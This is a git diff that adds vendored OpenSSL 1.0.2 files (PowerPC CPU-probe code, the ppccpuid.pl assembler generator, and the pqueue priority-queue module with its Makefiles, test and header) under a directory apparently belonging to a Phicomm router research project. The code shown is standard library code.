+        if (uname(&uts) == 0 && strcmp(uts.machine, "ppc64") == 0)
+#endif
+            if (sigsetjmp(ill_jmp, 1) == 0) {
+                OPENSSL_ppc64_probe();
+                OPENSSL_ppccap_P |= PPC_FPU64;
+            }
+    } else {
+        /*
+         * Wanted code detecting POWER6 CPU and setting PPC_FPU64
+         */
+    }
+
+    if (sigsetjmp(ill_jmp, 1) == 0) {
+        OPENSSL_altivec_probe();
+        OPENSSL_ppccap_P |= PPC_ALTIVEC;
+        if (sigsetjmp(ill_jmp, 1) == 0) {
+            OPENSSL_crypto207_probe();
+            OPENSSL_ppccap_P |= PPC_CRYPTO207;
+        }
+    }
+
+    sigaction(SIGILL, &ill_oact, NULL);
+    sigprocmask(SIG_SETMASK, &oset, NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccpuid.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccpuid.pl
new file mode 100755
index 0000000..8d800fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ppccpuid.pl
@@ -0,0 +1,148 @@
+#!/usr/bin/env perl
+
+$flavour = shift;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+if ($flavour=~/64/) {
+    $CMPLI="cmpldi";
+    $SHRLI="srdi";
+    $SIGNX="extsw";
+} else {
+    $CMPLI="cmplwi";
+    $SHRLI="srwi";
+    $SIGNX="mr";
+}
+
+$code=<<___;
+.machine	"any"
+.text
+
+.globl	.OPENSSL_ppc64_probe
+.align	4
+.OPENSSL_ppc64_probe:
+	fcfid	f1,f1
+	extrdi	r0,r0,32,0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.OPENSSL_ppc64_probe,.-.OPENSSL_ppc64_probe
+
+.globl	.OPENSSL_altivec_probe
+.align	4
+.OPENSSL_altivec_probe:
+	.long	0x10000484	# vor	v0,v0,v0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.OPENSSL_altivec_probe,.-..OPENSSL_altivec_probe
+
+.globl	.OPENSSL_crypto207_probe
+.align	4
+.OPENSSL_crypto207_probe:
+	lvx_u	v0,0,r1
+	vcipher	v0,v0,v0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.OPENSSL_crypto207_probe,.-.OPENSSL_crypto207_probe
+
+.globl	.OPENSSL_wipe_cpu
+.align	4
+.OPENSSL_wipe_cpu:
+	xor	r0,r0,r0
+	fmr	f0,f31
+	fmr	f1,f31
+	fmr	f2,f31
+	mr	r3,r1
+	fmr	f3,f31
+	xor	r4,r4,r4
+	fmr	f4,f31
+	xor	r5,r5,r5
+	fmr	f5,f31
+	xor	r6,r6,r6
+	fmr	f6,f31
+	xor	r7,r7,r7
+	fmr	f7,f31
+	xor	r8,r8,r8
+	fmr	f8,f31
+	xor	r9,r9,r9
+	fmr	f9,f31
+	xor	r10,r10,r10
+	fmr	f10,f31
+	xor	r11,r11,r11
+	fmr	f11,f31
+	xor	r12,r12,r12
+	fmr	f12,f31
+	fmr	f13,f31
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.OPENSSL_wipe_cpu,.-.OPENSSL_wipe_cpu
+
+.globl	.OPENSSL_atomic_add
+.align	4
+.OPENSSL_atomic_add:
+Ladd:	lwarx	r5,0,r3
+	add	r0,r4,r5
+	stwcx.	r0,0,r3
+	bne-	Ladd
+	$SIGNX	r3,r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,2,0
+	.long	0
+.size	.OPENSSL_atomic_add,.-.OPENSSL_atomic_add
+
+.globl	.OPENSSL_rdtsc
+.align	4
+.OPENSSL_rdtsc:
+	mftb	r3
+	mftbu	r4
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.OPENSSL_rdtsc,.-.OPENSSL_rdtsc
+
+.globl	.OPENSSL_cleanse
+.align	4
+.OPENSSL_cleanse:
+	$CMPLI	r4,7
+	li	r0,0
+	bge	Lot
+	$CMPLI	r4,0
+	beqlr-
+Little:	mtctr	r4
+	stb	r0,0(r3)
+	addi	r3,r3,1
+	bdnz	\$-8
+	blr
+Lot:	andi.	r5,r3,3
+	beq	Laligned
+	stb	r0,0(r3)
+	subi	r4,r4,1
+	addi	r3,r3,1
+	b	Lot
+Laligned:
+	$SHRLI	r5,r4,2
+	mtctr	r5
+	stw	r0,0(r3)
+	addi	r3,r3,4
+	bdnz	\$-8
+	andi.	r4,r4,3
+	bne	Little
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,2,0
+	.long	0
+.size	.OPENSSL_cleanse,.-.OPENSSL_cleanse
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile
new file mode 100644
index 0000000..fb36a0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile
@@ -0,0 +1,83 @@
+#
+# OpenSSL/crypto/pqueue/Makefile
+#
+
+DIR=	pqueue
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=pqueue.c
+LIBOBJ=pqueue.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pqueue.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pqueue.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+pqueue.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pqueue.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pqueue.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+pqueue.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pqueue.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pqueue.o: ../../include/openssl/symhacks.h ../cryptlib.h pqueue.c pqueue.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.bak
new file mode 100644
index 0000000..fb36a0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.bak
@@ -0,0 +1,83 @@
+#
+# OpenSSL/crypto/pqueue/Makefile
+#
+
+DIR=	pqueue
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=pqueue.c
+LIBOBJ=pqueue.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pqueue.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pqueue.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+pqueue.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pqueue.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pqueue.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+pqueue.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pqueue.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pqueue.o: ../../include/openssl/symhacks.h ../cryptlib.h pqueue.c pqueue.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.save
new file mode 100644
index 0000000..fb36a0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/Makefile.save
@@ -0,0 +1,83 @@
+#
+# OpenSSL/crypto/pqueue/Makefile
+#
+
+DIR=	pqueue
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=pqueue.c
+LIBOBJ=pqueue.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pqueue.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pqueue.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+pqueue.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pqueue.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pqueue.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+pqueue.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pqueue.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pqueue.o: ../../include/openssl/symhacks.h ../cryptlib.h pqueue.c pqueue.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pq_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pq_test.c
new file mode 100644
index 0000000..479ab22
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pq_test.c
@@ -0,0 +1,94 @@
+/* crypto/pqueue/pq_test.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "pqueue.h"
+
+int main(void)
+{
+    pitem *item;
+    pqueue pq;
+
+    pq = pqueue_new();
+
+    item = pitem_new(3, NULL);
+    pqueue_insert(pq, item);
+
+    item = pitem_new(1, NULL);
+    pqueue_insert(pq, item);
+
+    item = pitem_new(2, NULL);
+    pqueue_insert(pq, item);
+
+    item = pqueue_find(pq, 1);
+    fprintf(stderr, "found %ld\n", item->priority);
+
+    item = pqueue_find(pq, 2);
+    fprintf(stderr, "found %ld\n", item->priority);
+
+    item = pqueue_find(pq, 3);
+    fprintf(stderr, "found %ld\n", item ? item->priority : 0);
+
+    pqueue_print(pq);
+
+    for (item = pqueue_pop(pq); item != NULL; item = pqueue_pop(pq))
+        pitem_free(item);
+
+    pqueue_free(pq);
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.c
new file mode 100644
index 0000000..75f9734
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.c
@@ -0,0 +1,235 @@
+/* crypto/pqueue/pqueue.c */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include "pqueue.h"
+
+typedef struct _pqueue {
+    pitem *items;
+    int count;
+} pqueue_s;
+
+pitem *pitem_new(unsigned char *prio64be, void *data)
+{
+    pitem *item = (pitem *)OPENSSL_malloc(sizeof(pitem));
+    if (item == NULL)
+        return NULL;
+
+    memcpy(item->priority, prio64be, sizeof(item->priority));
+
+    item->data = data;
+    item->next = NULL;
+
+    return item;
+}
+
+void pitem_free(pitem *item)
+{
+    if (item == NULL)
+        return;
+
+    OPENSSL_free(item);
+}
+
+pqueue_s *pqueue_new()
+{
+    pqueue_s *pq = (pqueue_s *)OPENSSL_malloc(sizeof(pqueue_s));
+    if (pq == NULL)
+        return NULL;
+
+    memset(pq, 0x00, sizeof(pqueue_s));
+    return pq;
+}
+
+void pqueue_free(pqueue_s *pq)
+{
+    if (pq == NULL)
+        return;
+
+    OPENSSL_free(pq);
+}
+
+pitem *pqueue_insert(pqueue_s *pq, pitem *item)
+{
+    pitem *curr, *next;
+
+    if (pq->items == NULL) {
+        pq->items = item;
+        return item;
+    }
+
+    for (curr = NULL, next = pq->items;
+         next != NULL; curr = next, next = next->next) {
+        /*
+         * we can compare 64-bit value in big-endian encoding with memcmp:-)
+         */
+        int cmp = memcmp(next->priority, item->priority, 8);
+        if (cmp > 0) {          /* next > item */
+            item->next = next;
+
+            if (curr == NULL)
+                pq->items = item;
+            else
+                curr->next = item;
+
+            return item;
+        }
+
+        else if (cmp == 0)      /* duplicates not allowed */
+            return NULL;
+    }
+
+    item->next = NULL;
+    curr->next = item;
+
+    return item;
+}
+
+pitem *pqueue_peek(pqueue_s *pq)
+{
+    return pq->items;
+}
+
+pitem *pqueue_pop(pqueue_s *pq)
+{
+    pitem *item = pq->items;
+
+    if (pq->items != NULL)
+        pq->items = pq->items->next;
+
+    return item;
+}
+
+pitem *pqueue_find(pqueue_s *pq, unsigned char *prio64be)
+{
+    pitem *next;
+    pitem *found = NULL;
+
+    if (pq->items == NULL)
+        return NULL;
+
+    for (next = pq->items; next->next != NULL; next = next->next) {
+        if (memcmp(next->priority, prio64be, 8) == 0) {
+            found = next;
+            break;
+        }
+    }
+
+    /* check the one last node */
+    if (memcmp(next->priority, prio64be, 8) == 0)
+        found = next;
+
+    if (!found)
+        return NULL;
+
+#if 0                           /* find works in peek mode */
+    if (prev == NULL)
+        pq->items = next->next;
+    else
+        prev->next = next->next;
+#endif
+
+    return found;
+}
+
+void pqueue_print(pqueue_s *pq)
+{
+    pitem *item = pq->items;
+
+    while (item != NULL) {
+        printf("item\t%02x%02x%02x%02x%02x%02x%02x%02x\n",
+               item->priority[0], item->priority[1],
+               item->priority[2], item->priority[3],
+               item->priority[4], item->priority[5],
+               item->priority[6], item->priority[7]);
+        item = item->next;
+    }
+}
+
+pitem *pqueue_iterator(pqueue_s *pq)
+{
+    return pqueue_peek(pq);
+}
+
+pitem *pqueue_next(pitem **item)
+{
+    pitem *ret;
+
+    if (item == NULL || *item == NULL)
+        return NULL;
+
+    /* *item != NULL */
+    ret = *item;
+    *item = (*item)->next;
+
+    return ret;
+}
+
+int pqueue_size(pqueue_s *pq)
+{
+    pitem *item = pq->items;
+    int count = 0;
+
+    while (item != NULL) {
+        count++;
+        item = item->next;
+    }
+    return count;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.h
new file mode 100644
index 0000000..d40d9c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.h
@@ -0,0 +1,99 @@
+/* crypto/pqueue/pqueue.h */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_PQUEUE_H
+# define HEADER_PQUEUE_H
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+typedef struct _pqueue *pqueue;
+
+typedef struct _pitem {
+    unsigned char priority[8];  /* 64-bit value in big-endian encoding */
+    void *data;
+    struct _pitem *next;
+} pitem;
+
+typedef struct _pitem *piterator;
+
+pitem *pitem_new(unsigned char *prio64be, void *data);
+void pitem_free(pitem *item);
+
+pqueue pqueue_new(void);
+void pqueue_free(pqueue pq);
+
+pitem *pqueue_insert(pqueue pq, pitem *item);
+pitem *pqueue_peek(pqueue pq);
+pitem *pqueue_pop(pqueue pq);
+pitem *pqueue_find(pqueue pq, unsigned char *prio64be);
+pitem *pqueue_iterator(pqueue pq);
+pitem *pqueue_next(piterator *iter);
+
+void pqueue_print(pqueue pq);
+int pqueue_size(pqueue pq);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif                          /* ! HEADER_PQUEUE_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pqueue/pqueue.o
new file mode 100644
index 0000000000000000000000000000000000000000..bf0f1c25a2f4aaa4d899723cd104d6df1e582cce
GIT binary patch
literal 3544
zcmbVO-EUMy6rbH~=~nRW1u?C`z&@aqC^x%+(fXkK(QRkLEp6#mTH3m7%dIqYKiJ+?
zzyyhP2{#LgKI<RAi;pyfn6R-VnCJsBK9C@h#6~a;egu8cXzDq0&n(;V`VmetGiQGH
